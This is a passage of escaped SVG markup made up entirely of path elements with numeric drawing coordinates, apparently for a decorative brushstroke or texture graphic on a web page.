d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path 